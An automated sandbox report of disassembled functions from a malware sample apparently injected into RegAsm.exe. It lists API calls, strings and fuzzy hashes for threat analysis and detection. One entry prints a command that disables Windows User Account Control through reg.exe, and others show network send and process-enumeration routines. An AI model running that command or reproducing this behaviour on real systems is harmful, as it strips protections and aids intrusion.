                                Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ClassCreateErrorLastRegisterWindow
                                • String ID: 0$MsgWindowClass
                                • API String ID: 2877667751-2410386613
                                • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                • CloseHandle.KERNEL32(?), ref: 004077AA
                                • CloseHandle.KERNEL32(?), ref: 004077AF
                                Strings
                                • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreateProcess
                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                • API String ID: 2922976086-4183131282
                                • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                Download Yara Rule
                                Strings
                                • SG, xrefs: 004076DA
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                • API String ID: 0-643455097
                                • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                Function 0044333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,004432EB,?,?,0044328B,?), ref: 0044336D
                                • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                • CloseHandle.KERNEL32(?), ref: 00405140
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                • String ID: KeepAlive | Disabled
                                • API String ID: 2993684571-305739064
                                • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                • Sleep.KERNEL32(00002710), ref: 0041AE07
                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                • String ID: Alarm triggered
                                • API String ID: 614609389-2816303416
                                • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CD6F
                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CD7C
                                • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CD8F
                                Strings
                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                • API String ID: 3024135584-2418719853
                                • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                • _free.LIBCMT ref: 00444E06
                                • _free.LIBCMT ref: 00444E1D
                                • _free.LIBCMT ref: 00444E3C
                                • _free.LIBCMT ref: 00444E57
                                • _free.LIBCMT ref: 00444E6E
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$AllocateHeap
                                • String ID:
                                • API String ID: 3033488037-0
                                • Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                • Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                • _free.LIBCMT ref: 004493BD
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00449589
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                • String ID:
                                • API String ID: 1286116820-0
                                • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                  • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                • String ID:
                                • API String ID: 4269425633-0
                                • Opcode ID: 050d440512ad4bd2d5c4b985fe1e5d11bc0defa287e01fcc1b5db6667af7a0db
                                • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                • Opcode Fuzzy Hash: 050d440512ad4bd2d5c4b985fe1e5d11bc0defa287e01fcc1b5db6667af7a0db
                                • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                Function 0045112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                • __alloca_probe_16.LIBCMT ref: 004511B1
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                • __freea.LIBCMT ref: 0045121D
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                • String ID:
                                • API String ID: 313313983-0
                                • Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                • Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                Download Yara Rule
                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                • _free.LIBCMT ref: 0044F3BF
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                • String ID:
                                • API String ID: 336800556-0
                                • Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                • Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                • _free.LIBCMT ref: 004482D3
                                • _free.LIBCMT ref: 004482FA
                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free
                                • String ID:
                                • API String ID: 3170660625-0
                                • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 004509D4
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 004509E6
                                • _free.LIBCMT ref: 004509F8
                                • _free.LIBCMT ref: 00450A0A
                                • _free.LIBCMT ref: 00450A1C
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00444066
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00444078
                                • _free.LIBCMT ref: 0044408B
                                • _free.LIBCMT ref: 0044409C
                                • _free.LIBCMT ref: 004440AD
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                Download Yara Rule
                                APIs
                                • _strpbrk.LIBCMT ref: 0044E738
                                • _free.LIBCMT ref: 0044E855
                                  • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD1B
                                  • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                  • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                • String ID: *?$.
                                • API String ID: 2812119850-3972193922
                                • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                Download Yara Rule
                                APIs
                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                  • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                  • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C52A
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                • String ID: XQG$NG$PG
                                • API String ID: 1634807452-3565412412
                                • Opcode ID: fa8e6cd71303f921af7aa315b6e572632f3cab55c95f2ef26eb534f0bd843a50
                                • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                • Opcode Fuzzy Hash: fa8e6cd71303f921af7aa315b6e572632f3cab55c95f2ef26eb534f0bd843a50
                                • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                Download Yara Rule
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: `#D$`#D
                                • API String ID: 885266447-2450397995
                                • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
                                • _free.LIBCMT ref: 00443540
                                • _free.LIBCMT ref: 0044354A
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$FileModuleName
                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                • API String ID: 2506810119-1068371695
                                • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
